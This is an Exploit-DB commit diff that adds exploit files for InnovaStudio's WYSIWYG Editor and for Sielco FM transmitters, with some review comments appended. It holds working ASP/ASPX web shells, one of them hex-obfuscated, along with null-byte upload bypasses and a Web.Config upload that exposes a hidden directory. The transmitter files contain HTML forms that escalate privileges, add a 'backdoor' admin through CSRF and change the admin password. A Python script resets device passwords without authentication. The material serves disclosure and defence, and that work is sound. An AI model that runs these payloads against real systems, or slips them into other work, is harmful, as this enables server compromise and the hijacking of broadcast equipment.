DB: 2023-04-15

16 changes to exploits/shellcodes/ghdb

InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal

Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure

Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)

Bludit 4.0.0-rc-2 - Account takeover

Microsoft Windows 11 - 'cmd.exe' Denial of Service
This commit is contained in:
Exploit-DB 2023-04-15 00:16:19 +00:00
parent f65c0558fe
commit 2f07358143
15 changed files with 1562 additions and 39 deletions


@ -0,0 +1,330 @@
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################################
# #
# What is the App_Data Folder useful? #
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons. #
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell. #
# #
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" Sometimes also it can be a "Service Permissions" vulnerability. "
" Sometimes also it can be a "Binary Permissions " vulnerability. "
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" And then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================
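Review bot: the `# CVE : 0DAY` field in the header is not an identifier and should read N/A (or be left empty) until a CVE is assigned, and `Product: Asset Manager` should say that Asset Manager is the file-management component of the WYSIWYG Editor named in the title. Every POST carries `Content-Length: 473` although the three bodies differ in size (the Web.Config body alone is far longer), so the header was pasted from one capture and should be dropped or corrected; "RESPONCE" should be "RESPONSE". Two separate weaknesses are demonstrated and deserve separate naming: the `oUpload.AllowedTypes` check at line 234 is defeated by a NUL byte (`%00`) in the filename, so the server-side fix is to reject any filename containing a NUL byte and to evaluate the extension on the exact name that is written to disk; and `inpCurrFolder2` is accepted as an arbitrary absolute path (`...\httpdocs\App_Data`), which is the directory-traversal root cause, so the upload root must be fixed server-side and the supplied path canonicalized and confined to it, with writes of `Web.Config` refused outright. The closing SmarterMail section claims a critical vulnerability but includes no request or response, and the quoted data directory sits under `C:\Program Files (x86)\SmarterTools\...`, outside the `httpdocs` tree used by every earlier request; add the supporting capture or mark that section as untested.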


@ -0,0 +1,74 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="test" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="2" />
<input type="hidden" name="user3" value="" />
<input type="hidden" name="pwd3" value="" />
<input type="hidden" name="pwd3bis" value="" />
<input type="hidden" name="auth3" value="" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
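Review bot: the form posts to `http://transmitter/protect/users.htm` with no note that `transmitter` is a placeholder for the device address, and although the description says the request comes from a user holding Read permissions, the PoC never mentions that the browser must already carry a valid session for `/protect/`; add both to the header. The PoC sets `user2` to `test` and `auth2` to `2` while leaving `pwd2`/`pwd2bis` empty, so state whether an empty password is accepted for that slot or the existing one is kept. On the vendor side the fix is a server-side check that the requesting session's own role permits editing the `authN` fields, which are currently applied as submitted.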


@ -0,0 +1,59 @@
## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The Cookie session ID 'id' is of an insufficient length and
can be exploited by brute force, which may allow a remote attacker
to obtain a valid session, bypass authentication and manipulate
the transmitter.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5758
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php
26.01.2023
--
# Session values (len=5)
Cookie: id=44189
Cookie: id=37692
Cookie: id=+6638
Cookie: id=+3077
...
...
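Review bot: the evidence is four sample cookie values and the comment `len=5`, two of them with a leading `+`; the advisory should state the observed value format and the resulting keyspace explicitly so the severity of the brute-force claim can be judged, and should say whether the device throttles or invalidates sessions, since a 5-character identifier with no throttling is the actual finding. There is no capture showing an `id` cookie being presented to a `/protect/` page and accepted, so add one; the `--` separator followed by two `...` lines reads as an unfinished list. The remediation to name is a session identifier drawn from a cryptographically secure generator with at least 64 bits of entropy, plus failed-attempt throttling.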


@ -0,0 +1,80 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
## Exploit Author: LiquidWorm
Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php
26.01.2023
-->
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="" />
<input type="hidden" name="user3" value="backdoor" />
<input type="hidden" name="pwd3" value="backdoor123" />
<input type="hidden" name="pwd3bis" value="backdoor123" />
<input type="hidden" name="auth3" value="2" />
<input type="submit" value="Adminize!" />
</form>
</body>
</html>
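Review bot: the header repeats the title as a bare line (`Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery`) directly under `## Exploit Title:`; drop the duplicate. The PoC creates an account `backdoor`/`backdoor123` with `auth3=2` (Admin, per the value mapping in ZSL-2023-5755) and, as written, requires the victim to click the submit button, so the description's "if a logged-in user visits a malicious web site" should say that a click is needed. The same `users.htm` endpoint and parameter set appear in ZSL-2023-5755 and ZSL-2023-5756; cross-reference them, since a per-session anti-CSRF token on `/protect/users.htm` plus a `SameSite` attribute on the session cookie addresses this finding, while the missing server-side role check addresses the other two.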


@ -0,0 +1,75 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from improper access control when
editing users. A user with Read permissions can manipulate users,
passwords and permissions by sending a single HTTP POST request
with modified parameters and edit other users' names, passwords
and permissions including admin password.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 -->
<input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm -->
<input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 -->
<input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm -->
<input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 -->
<input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users" />
</form>
</body>
</html>
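Review bot: the submit label reads "Modify admin pwd, delete all users", but the form sends no delete action; it sets `user1`..`user3` to empty strings with `authN=0`, and the inline comments only say "set/modify". State explicitly that submitting an empty name clears the slot, because that is the behaviour the PoC relies on. `PWDCHANGED` is a placeholder for the new admin password (`pwd0` and `pwd0bis` must match) and should be labelled as one. As with ZSL-2023-5755, the root cause is that `/protect/users.htm` applies every submitted field without checking whether the requesting session may edit that user or the admin password (`pwd0`), so one server-side authorization check on this handler fixes both advisories.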


@ -0,0 +1,105 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
## Exploit Author: LiquidWorm
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
# PolyEco1000 CPU:1.9.4 FPGA:10.19
# PolyEco1000 CPU:1.9.3 FPGA:10.19
# PolyEco500 CPU:1.7.0 FPGA:10.16
# PolyEco300 CPU:2.0.2 FPGA:10.19
# PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constants user/role (user/admin). This can
# be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#
import requests
print( '''
.- _ _ -.
/ / \\ \\
( ( (` (-o-) `) ) )
\ \_ ` -+- ` _/ /
`- -+- -`
-+-
-+-
-+-
-+-
-+-
-+-
/ \\
*****************************************************
! Sielco PolyEco Authentication Bypass Script !
*****************************************************
Please note that this script is for educational and
ethical purposes only. Using it for unauthorized
access or malicious activities is strictly prohibited
and can have serious legal and ethical consequences.
The responsibility of using this script in a lawful
and ethical manner lies solely with the user. The
author or creator of this script shall not be held
responsible for any unlawful or unethical activities
performed by the users.
''' )
url = input( ' Enter the URL (e.g. http://host:8090): ' )
if not 'http' in url :
url = 'http://{}'.format( url )
user = input( ' Enter the desired role (e.g. user or admin): ')
if user not in [ 'user', 'admin' ] :
exit( ' Only \'user\' or \'admin\' please.' )
password = input( ' Enter the desired password: ' )
end = '/protect/users.htm'
payload = {}
if user == "user" :
payload[ 'pwd_admin' ] = ''
payload[ 'pwd_user' ] = password
elif user == 'admin' :
payload[ 'pwd_admin' ] = password
payload[ 'pwd_user' ] = ''
r = requests.post( url + end, data = payload )
if r.status_code == 200 :
print( '\n MSG: OK.' )
else:
print( '\n MSG: ERROR!' )
